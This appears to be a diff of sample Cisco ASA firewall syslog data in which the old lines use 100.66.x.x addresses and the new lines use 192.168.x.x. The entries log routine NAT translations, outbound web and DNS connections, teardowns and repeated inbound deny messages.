%ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: 